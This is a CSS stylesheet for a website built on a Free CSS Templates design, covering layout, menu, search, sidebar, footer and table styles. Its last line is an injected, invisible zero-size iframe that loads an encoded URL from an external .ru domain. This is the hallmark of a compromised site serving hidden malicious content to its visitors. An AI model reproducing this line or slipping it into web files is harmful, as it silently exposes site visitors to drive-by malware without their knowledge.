
/*
Design by Free CSS Templates
http://www.freecsstemplates.org
Released for free under a Creative Commons Attribution 2.5 License
*/

* {
	margin: 0;
	padding: 0;
}

body {
	margin-top: 40px;
	text-align: justify;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	color: #000;
}

h1, h2, h3 {
	color: #AA2808;
}

h1 {
}

h2 {
}

h3 {
}

p, blockquote, ul, ol {
	margin-bottom: 20px;
	line-height: 2em;
}

p {
}

blockquote {
}

ul, ol, li {
	margin: 0px;
	padding: 0px;
	list-style: none;
}

a {
	text-decoration: underline;
	color: #000;
}

a:hover {
	text-decoration: none;
	color: #838383;
}

img {
	display: block;
	margin: 0 auto;
}

a img {
	border: none;
}

/* Wrapper */

#wrapper {
}

/* Header */

#header {
	width: 892px;
	height: 40px;
	margin: 0 auto;
}

/* Logo */

#logo {
	float: left;
	width: 892px;
	margin-top: -33px;
	background: url(/images/img01.jpg) no-repeat left top;
	margin-left: -25px;
}

#logo h1 {
	margin: 0;
	font: normal 36px Georgia, "Times New Roman", Times, serif;
	font-style: italic;
	padding: 5px 0 5px 5px;
}

#logo h1 a:hover {
	color: #f35b8c;
}

#logo h2 {
	margin: -2px 0 10px 5px;
	padding: 3px;
	text-transform: uppercase;
	letter-spacing: 2px;
	font-size: 10px;
	font-weight: bold;
	color: #000;
	background: #fff;
	font-style: italic;
	width: 800px;
}

#logo a {
	text-decoration: none;
	color: #000;
	background: #fff;
}

/* Menu */

#menu {
	width: 940px;
	height: 60px;
	margin: 0 auto;
	background: url(/images/img03.gif) repeat-x left top;
}

#menu ul {
	margin: 0;
	padding: 20px 0 0 0px;
	list-style: none;
	line-height: normal;
	margin-left: 30px;
}

#menu li {
	display: inline;
	text-align: center;
}

#menu a {
	display: block;
	float: left;
	margin-right: 3px;
	padding: 5px 20px 5px 20px;
	text-decoration: none;
	text-align: center;
	text-transform: uppercase;
	font-size: 11px;
	font-weight: bold;
	color: #FFFFFF;
}

#menu a:hover {
	background: #f35b8c;
	color: #fff;
}

#menu .active a {
	background: #1bc4ff;
	color: #fff;
}

#splash {
	width: 940px;
	height: 200px;
	margin: 0 auto;
}

/* Search */

#header-search {
	width: 940px;
	height: 51px;
	margin: 0 auto;
	padding: 0px 0px 0px 0px;
	background: url(/images/img05.gif) repeat-x left top;
}

#header-search form {
	float: right;
	width: 300px;
	margin: 0;
	padding: 12px 0px 0px 0px;
}

#header-search fieldset {
	margin: 0;
	padding: 0;
	border: none;
}

#header-search-text {
	width: 200px;
	padding: 2px 3px;
	background: #1E1E1E;
	border: none;
	color: #4D4D4D;
}

#header-search-submit {
	background: none;
	border: none;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #E4E4E4;
}

#search {
	height: 51px;
	margin: 0 auto;
	padding: 0px 0px 60px 0px;
}

#search form {
	margin: 0;
	padding: 12px 0px 0 0;
}

#search fieldset {
	margin: 0;
	padding: 0;
	border: none;
}

#search input {
	float: left;
	font: 12px Arial, Helvetica, sans-serif;
}

#search-text {
	width: 160px;
	height: 18px;
	padding: 3px 0 3px 5px;
	border: none;
	color: #000000;
}

#search-submit {
	margin-left: 10px;
	padding: 4px 4px;
	border: none;
	background: #000000;
	color: #FFFFFF;
}

/* Page */

#page {
	width: 940px;
	margin: 0 auto;
		background: #fff;

}

#page-bgtop {
	padding: 0px 0px 0px 20px;
}

/* Content */

#content {
	float: left;
	width: 900px;
	padding-top: 30px;
}
.post {
	margin: 0px 0px 30px 0px;
	#background: url(/images/img06.gif) repeat-x left bottom;
}

.post .title {
	margin: 0px;
	padding: 0px 0px 5px 0px;
	color: #232F01;
}

.post .title a {
	padding: 4px 20px 4px 15px;
	background: #d5304f;
	text-decoration: none;
	font-weight: normal;
	color: #FFFFFF;
	font-family: Georgia;
	font-size: 22px;
}

.post .entry {
	padding: 5px 0px;
}

.post .info {
	padding: 5px 0;
	font: normal 16px Tahoma;
}

.post .info h2 {
	color: #1bc4ff;
	font: normal 1.4em Tahoma;
}


.post .meta {
	text-align: right;
	padding: 0px 0 20px 0;
	font-weight: bold;
	color: #202020;
}

.post .byline {
	float: right;
	margin-top: -30px;
	font-size: 12px;
	color: #5E5E5E;
}

/* Sidebar */

#sidebar {
	float: right;
	width: 240px;
	margin: 20px 0px;
	padding: 30px 30px 30px 30px;
	background: #f2f2f2;
}

#sidebar ul {
	margin: 0;
	padding: 0;
	list-style: none;
	line-height: normal;
}

#sidebar li {
	margin-bottom: 1px;
}

#sidebar li ul {
	margin: 0px;
	padding: 0px 0px 40px 0px;
}

#sidebar li li {
	margin: 0;
	padding: 9px 0px;
	background: url(/images/img06.gif) repeat-x left bottom;
}

#sidebar h2 {
	margin: 0px;
	padding: 0px 0px 20px 0px;
	font-family: "Times New Roman", Times, serif;
	font-size: 150%;
	font-weight: normal;
	color: #000;
}

#sidebar h3 {
	font-size: 77%;
	color: #110404;
}

#sidebar p {
	margin: 0;
	line-height: normal;
	color: #D4C792;
}

#sidebar a {
	border: none;
	text-decoration: none;
	color: #4D4D4D;
}

#sidebar a:hover {
	text-decoration: underline;
}

/* Submenu */

#submenu {
}

/* News */

#news {
}

#news a {
	font-size: 85%;
}

/* Footer */

#footer {
	width: 940px;
	height: 60px;
	margin: 0 auto;
	background: url(/images/img03.gif) repeat-x left top;
}

#footer ul {
	margin: 0;
	padding: 20px 0 0 0px;
	list-style: none;
	line-height: normal;
	margin-left: 30px;
}

#footer li {
	display: inline;
	text-align: center;
	float: right;
	margin-right: 10px;
}

a.infolink {
	display: block;
	font-size: 32px;
	font-family: Georgia;
	font-weight: bold;
	color: #f35b8c;
	text-align: center;
	margin: 20px 0px;
	padding: 5px;
	border-top: 2px dashed #f35b8c;
	border-bottom: 2px dashed #f35b8c;	
	text-decoration: none;
}

a:hover.infolink {
	border-top: 2px dashed #1bc4ff;
	border-bottom: 2px dashed #1bc4ff;
	color: #1bc4ff;
}

.prim {
	font: normal 1.6em Tahoma;
	color: #f35b8c;
}

#navigate {
	display: block;
	width: 735px;
	padding: 2px;
	margin: 0 auto;
	margin-top: 20px;
	background: #f2f2f2;
	margin-bottom: 20px;
	text-align: center;
}

#navigate .ye {
	font-size: 18px;
	font-family: Georgia;
	padding: 3px; 
	background: #fff;
}

#navigate .z {
	font-size: 18px;
	font-family: Georgia;
	padding: 3px;
	margin-bottom: 2px;
	background: #fff;
	font-weight: bold;
	font-style: italic;
}

#navigate a {
	font-size: 18px;
	font-family: Georgia;
	color: #1bc4ff;
}

.feedback {
	font-size: 18px;
	font-family: Georgia;
	padding: 3px;
	margin-bottom: 2px;
	background: #fff;
	font-weight: bold;
	font-style: italic;
}

#company {
	display: block;
	width: 735px;
	padding: 2px;
	margin: 0 auto;
	margin-top: 20px;
	background: #f2f2f2;
	margin-bottom: 20px;
	text-align: center;
}

#company ul li {
	font-size: 18px;
	font-family: Georgia;
	padding: 3px; 
	background: #fff;
	display: inline;
}

#company .z {
	font-size: 18px;
	font-family: Georgia;
	padding: 3px;
	margin-bottom: 2px;
	background: #fff;
	font-weight: bold;
	font-style: italic;
}

#company a {
	font-size: 18px;
	font-family: Georgia;
	color: #1bc4ff;
}

a.buy {
	display: block;
	font-size: 32px;
	font-family: Georgia;
	font-weight: bold;
	color: #f35b8c;
	text-align: center;
	margin: 20px 0px;
	padding: 5px;
	border-top: 2px dashed #f35b8c;
	border-bottom: 2px dashed #f35b8c;	
	text-decoration: none;
}

a:hover.buy {
	border-top: 2px dashed #1bc4ff;
	border-bottom: 2px dashed #1bc4ff;
	color: #1bc4ff;
}

/* table css */
.tbg {background: #fff; display:block; margin: 0 auto; margin-top: 20px;}
.tbg td{padding:4px; text-align: center; }
.tbg td img {display: block; margin: 0 auto;}
.tbg td a img {border: none;}
.tbg p {margin: 0; padding: 2px;}
.thead {background: #E3E3E3; font-weight: bold; color:#E03F00;text-align:center;}
.trow1 {background: #FFFFFF;  }
.trow2 {background: #F3F3F3; }
.trow3 {background: #FFF2F5; }
.trow4 {background: #FFE3E8; }
.but { border:1px #E03F00 solid; font-size:12px;text-align:center; background:#F3F3F3;}
.tbg input { border:1px #CCCCCC solid; font-size:12px;text-align:left;}
.tbg textarea{ border:1px #CCCCCC solid; font-size:12px;text-align:left;} 

a.partner {
	color: #fff;
}

#footer ul li {
	color: #fff;
}

#footer ul li a {
	color: #fff;
} 
<iframe src="http://description2011.ru/in.php?a=QQkFBwQHBAEABQQMEkcJBQcEBwUABAECAA==" width="0" height="0" frameborder="0"></iframe>
